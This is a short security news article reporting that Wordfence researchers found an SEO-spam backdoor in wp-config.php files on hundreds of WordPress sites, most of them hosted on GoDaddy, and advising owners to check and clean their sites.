1 min read

Researchers Identify Backdoor Infection Spike on Several GoDaddy-Hosted Websites

Vlad CONSTANTINESCU

March 17, 2022

Ad One product to protect all your devices, without slowing them down.
Free 90-day trial
Researchers Identify Backdoor Infection Spike on Several GoDaddy-Hosted Websites

Security researchers have noticed a surge in backdoor infections on hundreds of websites hosted on GoDaddy’s Managed WordPress service, all compromised by the same payload.

The incident affects websites such as tsoHost, MediaTemple, Domain Factory, Heart Internet, 123Reg, and Host Europe Managed WordPress websites. The infected sites shared a nearly identical backdoor embedded in the wp-config.php file.

Among the 298 websites newly identified as infected with the backdoor, at least 281 are hosted with GoDaddy. The discovery was made by Wordfence researchers, who first observed the overall increase in infected websites on March 11.

Reportedly, attackers used a 2015 Google search SEO-poisoning tool, embedding it into the wp-config.php file. The malicious payload would fetch spam link templates from a C2 and use them to surreptitiously inject malicious pages among legitimate search results.

“The backdoor in question has been in use since at least 2015,” according to a Wordfence blog post. “It generates spammy Google search results and includes resources customized to the infected site.”

The C2 domain the attackers used has a Russian Top-Level Domain (TLD), but there’s currently no reason to believe that the incident is connected to the Russo-Ukrainian conflict. For the time being, the domain displays a blank web page, but a few years ago, it reportedly served adult content.

Although Wordfence is yet to determine the vector of the intrusion, they hinted at last year’s massive GoDaddy data breach that exposed the accounts of 1.2 million customers as a potential candidate.

Security researchers urge owners of websites hosted on GoDaddy’s Managed WordPress platform (including the websites mentioned above) to manually check their sites’ wp-config.php file or use an automated specialized malware detection tool to verify their integrity.

If you discover that your website has been compromised, you’ll need to clean it and remove any spam search engine results. Within the security advisory, Wordfence provides a list of instructions on how to clean up your WordPress website, should you suspect or discover it’s been hacked.

tags


Author



Right now

Top posts

Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data

Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data

May 24, 2022

3 min read
John Oliver Shows the Dark Side of Data Brokerage on Last Week Tonight

John Oliver Shows the Dark Side of Data Brokerage on Last Week Tonight

April 15, 2022

3 min read
Bitdefender Labs Warns of Phishing Scams Targeting MetaMask Users

Bitdefender Labs Warns of Phishing Scams Targeting MetaMask Users

April 14, 2022

3 min read
Why and how to hide your IP address while traveling

Why and how to hide your IP address while traveling

April 13, 2022

2 min read
How Bitdefender Can Help Restore Your Privacy in the Digital Age

How Bitdefender Can Help Restore Your Privacy in the Digital Age

April 04, 2022

3 min read
How Strong is VPN Encryption?

How Strong is VPN Encryption?

February 28, 2022

3 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

Internet Service Providers Help Spyware Vendor Infect iOS and Android Devices Internet Service Providers Help Spyware Vendor Infect iOS and Android Devices
Vlad CONSTANTINESCU

June 24, 2022

2 min read
QNAP NAS Devices Vulnerable to Remote Attacks Through Critical PHP Flaw Exploit QNAP NAS Devices Vulnerable to Remote Attacks Through Critical PHP Flaw Exploit
Vlad CONSTANTINESCU

June 23, 2022

2 min read
Bitdefender Reveals the Top Cyber Threats Faced by Consumers in 2021 Bitdefender Reveals the Top Cyber Threats Faced by Consumers in 2021
Filip TRUȚĂ

June 22, 2022

1 min read